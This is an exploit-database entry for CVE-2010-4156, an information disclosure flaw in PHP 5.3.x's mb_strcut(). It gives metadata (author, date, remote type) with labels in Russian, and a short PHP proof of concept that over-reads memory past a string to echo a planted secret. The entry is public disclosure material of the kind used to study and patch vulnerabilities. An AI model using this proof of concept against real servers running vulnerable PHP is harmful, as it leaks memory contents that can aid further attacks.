Exploit PHP 5.3.x - 'mb_strcut()' Information Disclosure

[Exploiter]

EDB-ID

34979

Проверка EDB

1. Пройдено

Автор

MATEUSZ KOCIELSKI

Тип уязвимости

REMOTE

Платформа

PHP

CVE

cve-2010-4156

Дата публикации

2010-11-07

PHP 5.3.x - 'mb_strcut()' Information Disclosure

# source: https://www.securityfocus.com/bid/44727/info
#
# PHP is prone to an information-disclosure vulnerability.
#
# Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 
#

<?php
$b = "bbbbbbbbbbb";
str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1);
$var3 = mb_strcut($b, 0, 1000);
echo $var3;
?>